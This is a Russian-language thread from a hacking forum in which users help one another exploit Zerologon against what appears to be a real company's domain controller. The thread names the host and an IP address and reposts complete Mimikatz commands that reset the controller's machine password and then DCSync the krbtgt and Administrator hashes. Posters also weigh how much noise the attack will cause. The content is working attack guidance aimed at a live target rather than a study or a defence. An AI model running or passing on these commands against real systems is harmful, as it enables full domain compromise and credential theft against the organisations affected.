• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc Zerologon help

bongiorno

RAM
Забанен
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
Сбросил пароли, но дальше не дампятся, пишет (The attempted logon is invalid. This is either due to a bad username or authentication information.), тк нет параметров запуска(домена), думаю из-за этого, через nslookup, ping, пробовал искать нет, нмапом сканил(Те домены, что выдало не подошли)

Ты в своем рассказе даже не сформулировал вопрос) чем дампишь? Кого именно ты пробовал искать? Команду и вывод нмапа можно увидеть? Если ты ничего не нашел то как ты сбросил пароль?

чем дампишь?
Дампит тем местом, что у него на аве между ног и думает им=))) Тс, что значит пароли сбросил. Там с DC на тачке хэш сбрасывашь, потом дампишь пароли все. Сбрасывай еще и дампи. Если сбросил пасс с DC, то дапмить должно без проблем хэшы

Ты в своем рассказе даже не сформулировал вопрос) чем дампишь? Кого именно ты пробовал искать? Команду и вывод нмапа можно увидеть? Если ты ничего не нашел то как ты сбросил пароль?
secretsdump

Скрытый контент для пользователей: IIIIXX.

dev-clx это домен контролер? ну и домен проверь
Контроллер, я проверял

Контроллер, я проверял
Ну во первых в твоей команде сикретс дампа у тебя указан фкдн "ad.test.com" хотя я вообще думаю там нужен домен и он в твоем таргете "hidden.com"
Енивей) Попробуй через мимик
Код:
# priv
privilege::debug

# Check
lsadump::zerologon /target:DEV-CLX.hidden.com /account:DEV-CLX$

# Exploit
lsadump::zerologon /target:DEV-CLX.hidden.com /account:DEV-CLX$ /exploit

# hash dump for Administrator and krbtgt
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.hidden.com /user:krbtgt /authuser:DEV-CLX$ /authdomain:hidden /authpassword:"" /authntlm
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.hidden.com /user:Administrator /authuser:DEV-CLX$ /authdomain:hidden /authpassword:"" /authntlm
DEV-CLX.hidden.com
я не знаю ты с внешки или по впну но на всякий я бы внес пару в файл хостс C:\Windows\system32\drivers\etc\hosts
Код:
167.114.77.152 DEV-CLX.hidden.com

Последнее редактирование:
Делал через MSF, скидывается пасс машины.Что будет если не восстановить потом обратно пасс у компа?
Ну как минимум нашумишь сильно

Ну во первых в твоей команде сикретс дампа у тебя указан фкдн "ad.test.com" хотя я вообще думаю там нужен домен и он в твоем таргете "core-lx.com"
Енивей) Попробуй через мимик
Код:
# priv
privilege::debug

# Check
lsadump::zerologon /target:DEV-CLX.core-lx.com /account:DEV-CLX$

# Exploit
lsadump::zerologon /target:DEV-CLX.core-lx.com /account:DEV-CLX$ /exploit

# hash dump for Administrator and krbtgt
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.core-lx.com /user:krbtgt /authuser:DEV-CLX$ /authdomain:core-lx /authpassword:"" /authntlm
lsadump::dcsync /domain:core-lx.com /dc:DEV-CLX.core-lx.com /user:Administrator /authuser:DEV-CLX$ /authdomain:core-lx /authpassword:"" /authntlm
DEV-CLX.core-lx.com
я не знаю ты с внешки или по впну но на всякий я бы внес пару в файл хостс C:\Windows\system32\drivers\etc\hosts
Код:
167.114.77.152 DEV-CLX.core-lx.com
Долго не отвечал, там все проще было на самом деле, моя осечка, за импакет не прочитал в нужном обьеме

Интересно конечно просить помощи и отвечать людям в секрете)) о чем речь идет догадайтесь сами
Таргет в паблик не хотел показывать, люди разные бывают, пойми меня тоже:smile2:

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх